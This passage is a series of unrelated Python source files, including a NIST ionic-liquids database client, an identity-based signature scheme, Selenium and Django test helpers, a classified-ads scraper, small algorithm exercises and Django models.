if ids[i+1] - ids[i] > 1:
print(ids[i] + 1)
break
f.close()
|
from dependency_injector import containers, providers
from core.env import Environment
from core.event_hub import EventHub
class Container(containers.DeclarativeContainer):
# database_client = providers.Singleton(
# init_db,
# db_name='database.db',
# migrations_dir='repository/migrations'
# )
env = providers.Singleton(
Environment
)
event_hub = providers.Factory(
EventHub,
env = env
)
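# Minimal usage sketch (illustrative; assumes Environment and EventHub need
# no further constructor arguments):
#   container = Container()
#   env = container.env()          # Singleton: the same Environment every call
#   hub = container.event_hub()    # Factory: a new EventHub per call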
|
# -*- coding: utf-8 -*-
"""
This package contains object classes and functions to access the Ionic Liquids Database - ILThermo (v2.0)
from NIST (Standard Reference Database #147) within Python.
Concept
-------
The :func:`pyilt2.query` function uses the *requests* module to carry out the query on the NIST server.
The resulting *JSON* object is then decoded to a Python dictionary (:doc:`resDict <resdict>`), which serves as input
to create a :class:`pyilt2.result` object.
The result object creates and stores for each hit of the query a :class:`pyilt2.reference` object,
which offers the method :meth:`pyilt2.reference.get` to acquire the full data (:doc:`setDict <setdict>`)
as a :class:`pyilt2.dataset` object.
Variables
---------
To handle the "problem" with expressing the physical property in a programmatic sense,
there are following module variables accessible:
.. py:data:: prop2abr
A dictionary with long description as *key* and abbreviation as *value*, like::
{'Activity': 'a',
'Adiabatic compressibility': 'kS',
'Apparent enthalpy': 'Hap',
'Apparent molar heat capacity': 'capm',
...}
.. py:data:: abr2prop
    Obviously the reversed version of :data:`prop2abr` ;)
.. py:data:: properties
.. deprecated:: 0.9.8
Use :data:`abr2prop` instead!
A dictionary where the *key* is an abbreviation and the *value* is a list containing the
NIST hash and a long description of the respective physical property::
{"a" : ["xuYB", "Activity"],
"phi" : ["GVwU", "Osmotic coefficient"],
"Xpeq" : ["DzMB", "Composition at phase equilibrium"],
"Xeut" : ["yfBw", "Eutectic composition"],
...}
.. py:data:: abr2key
This modified dictionary provides the translation between the abbreviation (dict's key)
of a physical property and the key (dict's value) as used in the http search request.
    Because these keys have been known to change, they are fetched
    just in time, on first use, via an HTTP request.
It looks like::
{'Dself': 'wCtj',
'Dterm': 'LZlp',
'Dtrac': 'QJLO',
...}
If you don't intend to write your own :func:`query` function, there is no need to access this variable.
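Example
-------
A minimal sketch of the query -> reference -> dataset flow described above
(the component name is just a placeholder)::
    import pyilt2
    hits = pyilt2.query(comp='water', prop='a')  # 'a' = Activity
    for ref in hits:
        ds = ref.get()  # full data set for this reference
        print(ref.sref, ds.shape)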
Classes & Functions
---------------------
"""
import requests
import numpy as np
from .proplist import prop2abr, abr2prop, abr2key, properties
from .version import __version__
__license__ = "MIT"
__docformat__ = 'reStructuredText'
searchUrl = "http://ilthermo.boulder.nist.gov/ILT2/ilsearch"
dataUrl = "http://ilthermo.boulder.nist.gov/ILT2/ilset"
def query(comp='', numOfComp=0, year='', author='', keywords='', prop=''):
""" Starts a query on the Ionic Liquids Database from NIST.
Each web form field is represented by a keyword argument.
To specify the physical property you have to use the respective :doc:`abbreviation <props>`.
The function returns a :class:`pyilt2.result` object, whether or not the query makes a hit.
:param comp: Chemical formula (case-sensitive), CAS registry number, or name (part or full)
:type comp: str
:param numOfComp: Number of mixture components. Default '0' means *any* number.
:type numOfComp: int
:param year: Publication year
:type year: str
:param author: Author's last name
:type author: str
:param keywords: Keyword(s)
:type keywords: str
:param prop: Physical property by abbreviation. Default '' means *unspecified*.
:return: result object
:rtype: :class:`pyilt2.result`
:raises pyilt2.propertyError: if the abbreviation for physical property is invalid
:raises pyilt2.queryError: if the database returns an Error on a query
"""
if prop:
if prop not in list(abr2prop.keys()):
raise propertyError(prop)
else:
# prp = properties[prop][0]
prp = abr2key[prop]
else:
prp = ''
params = dict(
cmp = comp,
ncmp = numOfComp,
year = year,
auth = author,
keyw = keywords,
prp = prp
)
r = requests.get(searchUrl, params=params)
resDict = r.json()
if len(resDict['errors']) > 0:
e = " *** ".join(resDict['errors'])
raise queryError(e)
return result(resDict)
class result(object):
""" Class to store query results.
The :class:`.result` object is created by the :func:`pyilt2.query` function.
Each hit of the query is represented by a :class:`pyilt2.reference` object.
    The built-in function :func:`len` returns the number of hits, i.e. the
    number of references stored in the result object.
It is iterable, so you can simply iterate over references, like:
.. code-block:: py
# iterate over references
for reference in result:
...
# One can also access the individual references as items:
first_reference = result[0]
last_reference = result[-1]
:param resDict: decoded JSON object
:type resDict: dict
"""
def __init__(self, resDict):
self._currentRefIndex = 0
#: original JSON object from NIST server decoded to a Python dictionary (:doc:`example <resdict>`)
self.resDict = resDict
# create reference objects
self.refs = []
for ref in self.resDict['res']:
ref = self._makeRefDict( ref )
self.refs.append( reference(ref) )
def __len__(self):
return len(self.refs)
def __iter__(self):
return self
def __next__(self):
if self._currentRefIndex < len(self):
out = self.refs[self._currentRefIndex]
self._currentRefIndex += 1
return out
self._currentRefIndex = 0
raise StopIteration()
def __getitem__(self, item):
return self.refs[item]
def _makeRefDict(self, refList):
out = {}
for i in range(0, len(refList)):
out[ self.resDict['header'][i] ] = refList[i]
return out
class reference(object):
""" Class to store a reference.
The :class:`.reference` objects will be created while initiating :class:`pyilt2.result` object.
It contains just a few meta data. To acquire the full data set, it offers the :meth:`pyilt2.reference.get` method.
:param refDict: part of ``resDict``
:type refDict: dict
"""
def __init__(self, refDict):
self.refDict = refDict
#: number of components as integer
self.numOfComp = 0
#: names of component names as list of strings
self.listOfComp = []
self._parseComp()
def __str__(self):
return self.ref
@property
def setid(self):
"""NIST setid (hash) as used as input for :class:`pyilt2.dataset`"""
return self.refDict['setid']
@property
def ref(self):
"""
Reference as in the result table on the website,
like ``Muster et al. (2018)``, ``Muster and Mann (2018)`` or ``Muster (2018a)``.
"""
return self.refDict['ref']
@property
def sref(self):
"""
Short reference, like ``MusterEtal2018``, ``MusterMann2018`` or ``Muster2018a``.
.. note::
            We are fairly confident that this reference (as derived from :attr:`.ref`)
            is unique within the database. It can therefore be used as an identifier
            for a source (publication) across multiple requests, for example as a
            BibTeX key.
"""
wds = self.ref.split()
year = wds[-1][1:-1]
if 'et al.' in self.ref:
return wds[0] + 'Etal' + year
elif 'and' in self.ref:
return wds[0] + wds[2] + year
else:
return wds[0] + year
@property
def year(self):
"""year of publication as integer"""
return int(self.ref.split()[-1][1:5])
@property
def author(self):
"""1st author’s last name"""
return self.ref.split()[0]
@property
def prop(self):
"""physical property"""
return self.refDict['prp'].strip()
@property
def np(self):
"""Number of data points"""
return int(self.refDict['np'])
def _parseComp(self):
for k in ['nm1','nm2','nm3']:
if self.refDict.get(k):
self.numOfComp += 1
self.listOfComp.append( self.refDict[k])
def get(self):
""" Returns the full data according to this reference.
:return: Dataset object
:rtype: :class:`pyilt2.dataset`
"""
return dataset(self.refDict['setid'])
class dataset(object):
""" Class to request & store the full data set.
The :class:`.dataset` object is created by the :meth:`pyilt2.reference.get` method.
:param setid: NIST setid (hash)
:type setid: str
:raises pyilt2.setIdError: if setid is invalid
"""
def __init__(self, setid):
#: NIST setid (hash) of this data set
self.setid = setid
#: original JSON object from NIST server decoded to a Python dictionary (:doc:`example <setdict>`)
self.setDict = {}
#: :class:`numpy.ndarray` containing the data points
self.data = np.array([])
#: List containing the **description** for each column of the data set
self.headerList = []
#: List containing the **physical property** for each column of the data set
self.physProps = []
#: List containing the **physical units** for each column of the data set
self.physUnits = []
        #: List containing the phase information (if applicable) for each column of the data set
self.phases = []
self._initBySetid()
self._dataNpArray()
self._dataHeader()
def _initBySetid(self):
r = requests.get(dataUrl, params=dict(set=self.setid))
# raise HTTPError
r.raise_for_status()
# check if response is empty
if r.text == '':
raise setIdError(self.setid)
self.setDict = r.json()
def _dataHeader(self):
headerList = self.setDict['dhead']
cnt = 0
for col in headerList:
prop = col[0].replace('<SUP>', '').replace('</SUP>', '')
if len(col) == 2:
phase = col[1]
else:
phase = None
if ',' in prop:
tmp = prop.split(',')
prop = ''.join(tmp[0:-1])
units = tmp[-1].strip()
else:
units = None
prop = prop.replace(' ', '_')
desc = prop
if phase:
desc = '{0:s}[{1:s}]'.format(prop, phase)
if units:
desc = '{0:s}/{1:s}'.format(desc, units)
self.headerList.append(desc)
self.physProps.append(prop)
self.physUnits.append(units)
self.phases.append(phase)
            if self._incol[cnt] == 2:
self.headerList.append( 'Delta(prev)' )
self.physProps.append( 'Delta[{0:s}]'.format(prop) )
self.physUnits.append(units)
self.phases.append(phase)
cnt += 1
self.headerLine = ' '.join(self.headerList)
def _dataNpArray(self):
raw = self.setDict['data']
rows = len(raw)
self._incol = []
acols = 0
for c in raw[0]:
acols += len(c)
self._incol.append(len(c))
self.data = np.zeros((rows, acols))
for i in range(0, len(raw)):
newrow = [item for sublist in raw[i] for item in sublist]
for j in range(0, len(newrow)):
self.data[i][j] = newrow[j]
@property
def fullcite(self):
return '"{0:s}", {1:s}'.format(self.setDict['ref']['title'], self.setDict['ref']['full'])
@property
def shape(self):
"""Tuple of :py:attr:`.data` array dimensions."""
return self.data.shape
@property
def np(self):
"""Number of data points"""
return len(self.data)
@property
def listOfComp(self):
"""List of component names as strings."""
out = []
for comp in self.setDict['components']:
out.append( comp['name'] )
return out
@property
def numOfComp(self):
"""Number of components as integer."""
return len(self.setDict['components'])
def write(self, filename, fmt='%+1.8e', header=None):
"""
Writes the data set to a text file.
:param filename: output file name
:type filename: str
:param fmt: str or sequence of strs, (see `numpy.savetxt`_ doc)
:type fmt: str
:param header: String that will be written at the beginning of the file. (default from :attr:`.headerList`)
:type header: str
.. _numpy.savetxt: https://docs.scipy.org/doc/numpy/reference/generated/numpy.savetxt.html
"""
if not header:
header = self.headerLine
np.savetxt(filename, self.data, fmt=fmt, delimiter=' ',
newline='\n', header=header, comments='# ')
class queryError(Exception):
"""Exception if the database returns an Error on a query."""
def __init__(self,note):
self.msg = note
def __str__(self):
return repr(self.msg)
class propertyError(Exception):
"""Exception if an invalid abbreviation (for physical property) is defined."""
def __init__(self,prop):
self.msg = 'Invalid abbreviation "{0:s}" for physical property!'.format(prop)
def __str__(self):
return repr(self.msg)
class setIdError(Exception):
"""Exception if the set NIST setid (hash) is invalid.
    Because the NIST web server still returns HTTP status code 200
    even if the set id is invalid (I would expect a 404 here!),
    this exception class was introduced.
"""
def __init__(self,setid):
self.msg = 'SetID "{0:s}" is unknown for NIST!'.format(setid)
def __str__(self):
return repr(self.msg)
|
'''David Naccache based Identity-Based Encryption
| From: "David Naccache Secure and Practical Identity-Based Encryption Section 4"
| Available from: http://eprint.iacr.org/2005/369.pdf
* type: encryption (identity-based)
* setting: bilinear groups (asymmetric)
:Authors: Gary Belvin
:Date: 06/2011
'''
from charm.toolbox.pairinggroup import PairingGroup,ZR,G1,G2,GT,pair
from charm.toolbox.PKSig import PKSig
from charm.toolbox.enum import Enum
from charm.toolbox.hash_module import Waters
import math
debug = False
class IBE_N04_Sig(PKSig):
"""
>>> from charm.toolbox.pairinggroup import PairingGroup
>>> group = PairingGroup('SS512')
>>> waters = Waters(group)
>>> ibe = IBE_N04_Sig(group)
>>> (public_key, secret_key) = ibe.keygen()
>>> ID = "bob@mail.com"
>>> msg = waters.hash("This is a test.")
>>> signature = ibe.sign(public_key, secret_key, msg)
>>> ibe.verify(public_key, msg, signature)
True
"""
"""Implementation of David Naccahe Identity Based Encryption"""
def __init__(self, groupObj):
PKSig.__init__(self)
#PKSig.setProperty(self, secdef='IND_ID_CPA', assumption='DBDH', secmodel='Standard')
#, other={'id':ZR}
#message_space=[GT, 'KEM']
global group
group = groupObj
def keygen(self, l=32):
'''l is the security parameter
with l = 32, and the hash function at 160 bits = n * l with n = 5'''
global waters
sha1_func, sha1_len = 'sha1', 20
g = group.random(G1) # generator for group G of prime order p
hLen = sha1_len * 8
n = int(math.floor(hLen / l))
waters = Waters(group, n, l, sha1_func)
alpha = group.random() #from Zp
g1 = g ** alpha # G1
g2 = group.random(G2) #G2
uprime = group.random(G2)
U = [group.random() for x in range(n)]
pk = {'g':g, 'g1':g1, 'g2': g2, 'uPrime':uprime, 'U': U,
'n':n, 'l':l, 'egg': pair(g, g2) ** alpha }
# mk = pk.copy()
mk = {'g':g, 'g1':g1, 'g2': g2, 'uPrime':uprime, 'U': U,
'n':n, 'l':l, 'egg': pair(g, g2) ** alpha }
mk['g2^alpha'] = g2 ** alpha #master secret
if debug:
print(mk)
return (pk, mk)
def sign(self, pk, sk, m):
'''v = (v1, .., vn) is an identity'''
r = group.random()
d1 = sk['uPrime']
for i in range(sk['n']):
d1 *= sk['U'][i] ** m[i]
d1 = sk['g2^alpha'] * (d1 ** r)
d2 = sk['g'] ** r
return {'d1': d1, 'd2':d2}
def verify(self, pk, msg, sig):
c3 = pk['uPrime']
for i in range(pk['n']):
c3 *= pk['U'][i] ** msg[i]
num = pair(pk['g'], sig['d1'])
dem = pair(sig['d2'], c3)
return pk['egg'] == num / dem
def main():
groupObj = PairingGroup('SS512')
ibe = IBE_N04_Sig(groupObj)
waters = Waters(group)
(pk, sk) = ibe.keygen()
# represents public identity
M = "bob@mail.com"
msg = waters.hash("This is a test.")
sig = ibe.sign(pk, sk, msg)
if debug:
print("original msg => '%s'" % M)
print("msg => '%s'" % msg)
print("sig => '%s'" % sig)
assert ibe.verify(pk, msg, sig), "Failed verification!"
if debug: print("Successful Verification!!! msg => '%s'" % msg)
if __name__ == '__main__':
debug = True
main()
|
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import Keys
from pages.base_page import BasePage
from utils.locators import ChatPageLocator
# Processing Functions
def message_sent_or_pending(label):
    # 'Sent', 'Delivered' and 'Read' all mean the message left the outbox
    if label in ('Sent', 'Delivered', 'Read'):
        return 'Yes'
    elif label == 'Pending':
        return 'No'
def message_seen_or_not(label):
    if label == 'Read':
        return 'Seen'
    elif label in ('Sent', 'Delivered', 'Pending'):
        return 'Not Seen'
class ChatPage(BasePage):
def __init__(self, driver):
self.locator = ChatPageLocator
super().__init__(driver)
def message_sent(self, message):
self.find_element(*self.locator.MESSAGE_BOX).send_keys(message + Keys.ENTER)
time.sleep(2)
def successful_send_message(self, message):
self.message_sent(message)
        value = self.find_element(*self.locator.ITEM_LOC).get_attribute('aria-label')
label = ''.join(value.split())
return message_sent_or_pending(label)
def message_seen_status(self, message):
self.message_sent(message)
        value = self.find_element(*self.locator.ITEM_LOC).get_attribute('aria-label')
label = ''.join(value.split())
return message_seen_or_not(label)
def whatsapp_logout_status(self):
try:
self.wait_element(*self.locator.MENU_ICON_XPATH).click()
time.sleep(2)
self.wait_element(*self.locator.LOGOUT_XPATH).click()
return 'Yes'
        except Exception as ec:  # NoSuchElementException is already a subclass of Exception
print(ec)
return 'No'
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from urllib.request import urlopen
from urllib.parse import quote
from bs4 import BeautifulSoup
import sys, os, glob
from reportlab.platypus import SimpleDocTemplate
from reportlab.lib.pagesizes import A4, landscape
from utils import str2bool, make_url, parse_inputs, get_region
from item import Immobilier, Vehicule, General
from common import DEFAULT_LOCALISATIONS, DEFAULT_CATEGORIES, ALIAS_DEPARTMENT
def get_item(data, model):
items = data.find('section', class_="tabsContent block-white dontSwitch")
if items:
for link in items.findAll('a'):
item_url = "http:"+link.get('href')
item_page = urlopen(item_url)
item_data = BeautifulSoup(item_page.read(), "html.parser")
obj = model(item_url, item_data)
yield obj
else:
print("Pas d'annonce")
def browse(url, categories):
category = url.split('/')[3]
if category not in categories:
raise Exception("Wrong URL: category '%s' does not exist" % category)
model = eval(categories[category])
page = urlopen(url)
data = BeautifulSoup(page.read(), "html.parser")
if data.find('span', class_="total_page"):
url_page = "https:" + data.find("a", class_="element page static link-like", id="next")["href"]
nbr_page = int(data.find("span", class_="total_page").text)
page_all = b''
for i in range(1,nbr_page+1):
print("page "+str(i)+"/"+str(nbr_page))
url_current = url_page.replace("?o=2", "?o="+str(i))
page_current = urlopen(url_current).read()
page_all += page_current
data_all = BeautifulSoup(page_all, "html.parser")
return(get_item(data_all, model))
else:
return(get_item(data, model))
if __name__ == '__main__':
# Parse inputs
args = parse_inputs()
    # Loop over the defined locations
keys = list(DEFAULT_LOCALISATIONS.keys())
# begin pdf file
doc = SimpleDocTemplate(args.report_name,pagesize=landscape(A4))
story=[]
if(args.departement == -1):
for key in keys:
cp = key
ville = DEFAULT_LOCALISATIONS[key]
            # Build the query URL for this location
URL = make_url(ville, cp, args)
# Print current city and cp
print(ville + " " + cp)
# Loop on result for city
for item in browse(URL, DEFAULT_CATEGORIES):
try:
item.serialize(args.image)
story += item.save(doc, args)
print("-----")
                except Exception:
print(item.ad_number())
print("%s: %s" % (sys.exc_info()[0], sys.exc_info()[1]))
print("=====")
else:
cp = None
ville = None
        # Build the query URL for this department
URL = make_url(ville, cp, args)
# Print current city and cp
print("search on region " + get_region(args) +", department "+ALIAS_DEPARTMENT[args.departement])
# Loop on result for city
for item in browse(URL, DEFAULT_CATEGORIES):
try:
item.serialize(args.image)
story += item.save(doc, args)
print("-----")
            except Exception:
print(item.ad_number())
print("%s: %s" % (sys.exc_info()[0], sys.exc_info()[1]))
print("=====")
# close pdf file
doc.build(story)
# Delete img files
for f in glob.glob("*.jpg"):
os.remove(f)
|
import pytest
from tests.mocks import MockChannel
from tests.output_betterproto.import_service_input_message import (
RequestResponse,
TestStub,
)
@pytest.mark.asyncio
async def test_service_correctly_imports_reference_message():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing(argument=1)
assert mock_response == response
@pytest.mark.asyncio
async def test_service_correctly_imports_reference_message_from_child_package():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing2(child_argument=1)
assert mock_response == response
@pytest.mark.asyncio
async def test_service_correctly_imports_nested_reference():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing3(nested_argument=1)
assert mock_response == response
|
class hand:
"""
models a poker hand
"""
def __init__(self):
self.hand = []
def deal_poker_hand(self, deck):
"""
this function adds 5 cards from the deck to the hand
:param deck: deck that cards are being drawn from
:return:
"""
for i in range(5):
self.hand.append(deck.drawCard())
@property
def what_is_it(self):
"""
evaluates the hand
:return: value of hand
"""
        pairs = []
        triples = []
        values = sorted([card.value for card in self.hand])
        suits = [card.suit for card in self.hand]
        for v in set(values):
            if values.count(v) == 4:
                return "4 of a kind"
            if values.count(v) == 3:
                triples.append(v)
            if values.count(v) == 2:
                pairs.append(v)
        is_flush = all(s == suits[0] for s in suits)
        # five distinct consecutive values form a straight
        # (ace-low straights are not handled here)
        is_straight = len(set(values)) == 5 and values[-1] - values[0] == 4
        if is_straight and is_flush:
            return "Straight Flush"
        if is_flush:
            return "Flush"
        if len(triples) == 1 and len(pairs) == 1:
            return "Full House"
        if is_straight:
            return "Straight"
        if len(triples) == 1 and len(pairs) == 0:
            return "3 of a kind"
        if len(pairs) == 2:
            return "2 pair"
        if len(pairs) == 1:
            return "1 pair"
        return "High card"
def print_hand(self):
"""
prints all cards in hand
:return: none
"""
for card in self.hand:
card.printCard()
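# Example (illustrative; assumes a deck object exposing drawCard()):
#   h = hand()
#   h.deal_poker_hand(deck)
#   h.print_hand()
#   print(h.what_is_it)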
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 24 12:05:17 2015
@author: HSH
"""
class Interval(object):
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution(object):
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
result = []
isInsert = False
for i in range(len(intervals)):
# newInterval already inserted
if isInsert:
result.append(intervals[i])
continue
# insert newInterval before current interval
if newInterval.end < intervals[i].start:
result.append(newInterval)
result.append(intervals[i])
isInsert = True
continue
# combine newInterval with current interval
if newInterval.start <= intervals[i].end:
newInterval.start = min(newInterval.start, intervals[i].start)
newInterval.end = max(newInterval.end, intervals[i].end)
continue
result.append(intervals[i])
if not isInsert:
result.append(newInterval)
return result
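# Example (illustrative):
#   res = Solution().insert([Interval(1, 3), Interval(6, 9)], Interval(2, 5))
#   [(i.start, i.end) for i in res]  ->  [(1, 5), (6, 9)]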
|
import math,string
import numpy as np
import time
import __builtin__
#
# MATLAB-like tic/toc for convenience
#
_tics = {None: 0.0}
def tic(id=None):
global _tics
now = time.time()
_tics[id] = now
return now
def toc(id=None):
global _tics
now = time.time()
return now - _tics[id]
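# Example (illustrative):
#   tic('load')
#   ... do some work ...
#   print("elapsed: %.3f s" % toc('load'))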
##################################################
_int2dtype = { 0 : np.bool,
1 : np.int8,
2 : np.uint8,
3 : np.int16,
4 : np.uint16,
5 : np.int32,
6 : np.uint32,
7 : np.int64,
8 : np.uint64,
9 : np.float32,
10: np.float64 }
_dtype2int = { np.bool : 0,
np.int8 : 1,
np.uint8 : 2,
np.int16 : 3,
np.uint16 : 4,
np.int32 : 5,
np.uint32 : 6,
np.int64 : 7,
np.uint64 : 8,
np.float32 : 9,
np.float64 : 10 }
_arg2dtype = { "bool" : np.bool, np.dtype('bool') : np.bool, np.bool : np.bool, __builtin__.bool : np.bool,
"int8" : np.int8, np.dtype('int8') : np.int8, np.int8 : np.int8, __builtin__.chr : np.int8,
"uint8" : np.uint8, np.dtype('uint8') : np.uint8, np.uint8 : np.uint8,
"int16" : np.int16, np.dtype('int16') : np.int16, np.int16 : np.int16,
"uint16" : np.uint16, np.dtype('uint16') : np.uint16, np.uint16 : np.uint16,
"int32" : np.int32, np.dtype('int32') : np.int32, np.int32 : np.int32, __builtin__.int : np.int32,
"uint32" : np.uint32, np.dtype('uint32') : np.uint32, np.uint32 : np.uint32,
"int64" : np.int64, np.dtype('int64') : np.int64, np.int64 : np.int64, __builtin__.long : np.int64,
"uint64" : np.uint64, np.dtype('uint64') : np.uint64, np.uint64 : np.uint64,
"float32": np.float32, np.dtype('float32'): np.float32, np.float32: np.float32,
"float64": np.float64, np.dtype('float64'): np.float64, np.float64: np.float64, __builtin__.float: np.float64 }
# copied from http://code.activestate.com/recipes/578323-human-readable-filememory-sizes-v2/
def format_bytecount(val,fmt=".2cM"):
""" define a size class to allow custom formatting
format specifiers supported :
em : formats the size as bits in IEC format i.e. 1024 bits (128 bytes) = 1Kib
eM : formats the size as Bytes in IEC format i.e. 1024 bytes = 1KiB
sm : formats the size as bits in SI format i.e. 1000 bits = 1kb
sM : formats the size as bytes in SI format i.e. 1000 bytes = 1KB
cm : format the size as bit in the common format i.e. 1024 bits (128 bytes) = 1Kb
cM : format the size as bytes in the common format i.e. 1024 bytes = 1KB
"""
if val == 0:
return "0"
# work out the scale, suffix and base
factor, suffix = (8, "b") if fmt[-1] in string.lowercase else (1,"B")
base = 1024 if fmt[-2] in ["e","c"] else 1000
# Add the i for the IEC format
suffix = "i"+ suffix if fmt[-2] == "e" else suffix
mult = ["","K","M","G","T","P"]
val = float(val) * factor
i = 0 if val < 1 else int(math.log(val, base))+1
v = val / math.pow(base,i)
v,i = (v,i) if v > 0.5 else (v*base,i-1)
# Identify if there is a width and extract it
width = "" if fmt.find(".") == -1 else fmt[:fmt.index(".")]
precis = fmt[:-2] if width == "" else fmt[fmt.index("."):-2]
# do the precision bit first, so width/alignment works with the suffix
t = ("{0:{1}f}"+mult[i]+suffix).format(v, precis)
return "{0:{1}}".format(t,width) if width != "" else t
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
import sys
class FunctionalTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
for arg in sys.argv:
if 'liveserver' in arg:
cls.server_url = 'http://' + arg.split('=')[1]
return
super().setUpClass()
cls.server_url = cls.live_server_url
@classmethod
def tearDownClass(cls):
if cls.server_url == cls.live_server_url:
super().tearDownClass()
def wait(self, locator):
return WebDriverWait(self.browser, 10).until(EC.presence_of_element_located(locator))
def setUp(self):
self.browser = webdriver.Chrome()
def tearDown(self):
self.browser.quit()
def check_for_row_in_list_table(self, row_text):
self.wait((By.CSS_SELECTOR, "#id_list_table tr"))
rows = self.browser.find_elements_by_css_selector("#id_list_table tr")
self.assertIn(row_text, [row.text for row in rows])
def get_item_input_box(self):
return self.wait((By.ID, 'id_text'))
|
#Create Pandas dataframe from the DarkSage output G['']
import pandas as pd
import numpy as np
# Multi-dimensional fields are converted to object-dtype pandas Series
# (one array per row) so they can be loaded into the DataFrame.
def _to_object_series(field):
    return pd.Series(list(G[field]), dtype=np.dtype("object"))
Pos_df = _to_object_series('Pos')
Vel_df = _to_object_series('Vel')
Spin_df = _to_object_series('Spin')
Disc_df = _to_object_series('DiscRadii')
Disc_gas_df = _to_object_series('DiscGas')
Disc_stars_df = _to_object_series('DiscStars')
SpinStars_df = _to_object_series('SpinStars')
SpinGas_df = _to_object_series('SpinGas')
SpinClassicalBulge_df = _to_object_series('SpinClassicalBulge')
DiscHI_df = _to_object_series('DiscHI')
DiscH2_df = _to_object_series('DiscH2')
DiscSFR_df = _to_object_series('DiscSFR')
DiscGasMetals_df = _to_object_series('DiscGasMetals')
DiscStarsMetals_df = _to_object_series('DiscStarsMetals')
######################################
DS = pd.DataFrame({'Type' : G['Type' ],
'GalaxyIndex' : G['GalaxyIndex' ],
'HaloIndex' : G['HaloIndex' ],
'SimulationHaloIndex' : G['SimulationHaloIndex' ],
'TreeIndex' : G['TreeIndex' ],
'SnapNum' : G['SnapNum' ],
'CentralGalaxyIndex' : G['CentralGalaxyIndex' ],
'CentralMvir' : G['CentralMvir' ],
'mergeType' : G['mergeType' ],
'mergeIntoID' : G['mergeIntoID' ],
'mergeIntoSnapNum' : G['mergeIntoSnapNum' ],
'dT' : G['dT' ],
'Pos' : Pos_df,
'Vel' : Vel_df ,
'Spin' : Spin_df ,
'Len' : G['Len' ],
'LenMax' : G['LenMax' ],
'Mvir' : G['Mvir' ],
'Rvir' : G['Rvir' ],
'Vvir' : G['Vvir' ],
'Vmax' : G['Vmax' ],
'VelDisp' : G['VelDisp' ],
'DiscRadii' : Disc_df,
'ColdGas' : G['ColdGas' ],
'StellarMass' : G['StellarMass' ],
'MergerBulgeMass' : G['MergerBulgeMass' ],
'InstabilityBulgeMass' : G['InstabilityBulgeMass' ],
'HotGas' : G['HotGas' ],
'EjectedMass' : G['EjectedMass' ],
'BlackHoleMass' : G['BlackHoleMass' ],
'IntraClusterStars' : G['IntraClusterStars' ],
'DiscGas' : Disc_gas_df,
'DiscStars' : Disc_stars_df,
'SpinStars' : SpinStars_df,
'SpinGas' : SpinGas_df,
'SpinClassicalBulge' : SpinClassicalBulge_df,
'StarsInSitu' : G['StarsInSitu' ],
'StarsInstability' : G['StarsInstability' ],
'StarsMergeBurst' : G['StarsMergeBurst' ],
'DiscHI' : DiscHI_df,
'DiscH2' : DiscH2_df,
'DiscSFR' : DiscSFR_df,
'MetalsColdGas' : G['MetalsColdGas' ],
'MetalsStellarMass' : G['MetalsStellarMass' ],
'ClassicalMetalsBulgeMass' : G['ClassicalMetalsBulgeMass' ],
'SecularMetalsBulgeMass' : G['SecularMetalsBulgeMass' ],
'MetalsHotGas' : G['MetalsHotGas' ],
'MetalsEjectedMass' : G['MetalsEjectedMass' ],
'MetalsIntraClusterStars' : G['MetalsIntraClusterStars' ],
'DiscGasMetals' : DiscGasMetals_df,
'DiscStarsMetals' : DiscStarsMetals_df,
'SfrFromH2' : G['SfrFromH2' ],
'SfrInstab' : G['SfrInstab' ],
'SfrMergeBurst' : G['SfrMergeBurst' ],
'SfrDiskZ' : G['SfrDiskZ' ],
'SfrBulgeZ' : G['SfrBulgeZ' ],
'DiskScaleRadius' : G['DiskScaleRadius' ],
'CoolScaleRadius' : G['CoolScaleRadius' ],
'StellarDiscScaleRadius' : G['StellarDiscScaleRadius' ],
'Cooling' : G['Cooling' ],
'Heating' : G['Heating' ],
'LastMajorMerger' : G['LastMajorMerger' ],
'LastMinorMerger' : G['LastMinorMerger' ],
'OutflowRate' : G['OutflowRate' ],
'infallMvir' : G['infallMvir' ],
'infallVvir' : G['infallVvir' ],
'infallVmax' : G['infallVmax' ]})
|
# -*- coding: utf-8 -*-
num = int(input())
fact = 1
# running product: computes num! (factorial)
for i in range(1, num + 1):
    fact = fact * i
print(fact)
|
# File: hw3_part4.py
# Author: Joel Okpara
# Date: 2/21/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: This program takes a temperature from the user
#              and reports the state of water at that temperature
def main():
    # The freezing point in Celsius is 0 degrees
    # The boiling point in Celsius is 100 degrees
    # The freezing point in Fahrenheit is 32 degrees
    # The boiling point in Fahrenheit is 212 degrees
temperature = float(input("Please enter the temperature"))
scale = input("Please enter 'c' for Celcius, or 'f' for Farenheit")
if scale != "c" and scale != "f":
print("Your input must be 'C' or 'F'!")
#Does celsius calculations
if scale == "c":
if temperature <= 0:
print("At this temperature, water is a solid")
elif temperature > 0 and temperature < 100:
print("At this temperature, water is a liquid")
else:
print("At this temperature, water is a gas")
    # Fahrenheit calculations
elif scale == "f":
if temperature <= 32:
print("At this temperature, water is a solid")
elif temperature > 32 and temperature < 212:
print("At this temperature, water is a liquid")
else:
print("At this temperature, water is a gas")
main()
|
from django.contrib import admin
from .models import Dog, Breed
# Register your models here.
@admin.register(Dog)
class DogAdmin(admin.ModelAdmin):
list_display = ('name', 'age', 'breed', 'gender', 'color')
search_fields = ('name',)
@admin.register(Breed)
class BreedAdmin(admin.ModelAdmin):
list_display = ('name', 'size')
|
from django.contrib.sites.models import Site
from django.db import models
from django.utils.translation import ugettext_lazy as _
class SiteSettings(models.Model):
site = models.OneToOneField(Site, related_name='settings')
class Meta:
verbose_name = _(u'site settings')
verbose_name_plural = _(u'site settings')
|
# Generated by Django 2.2.13 on 2020-07-08 16:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('product', '0001_initial'),
]
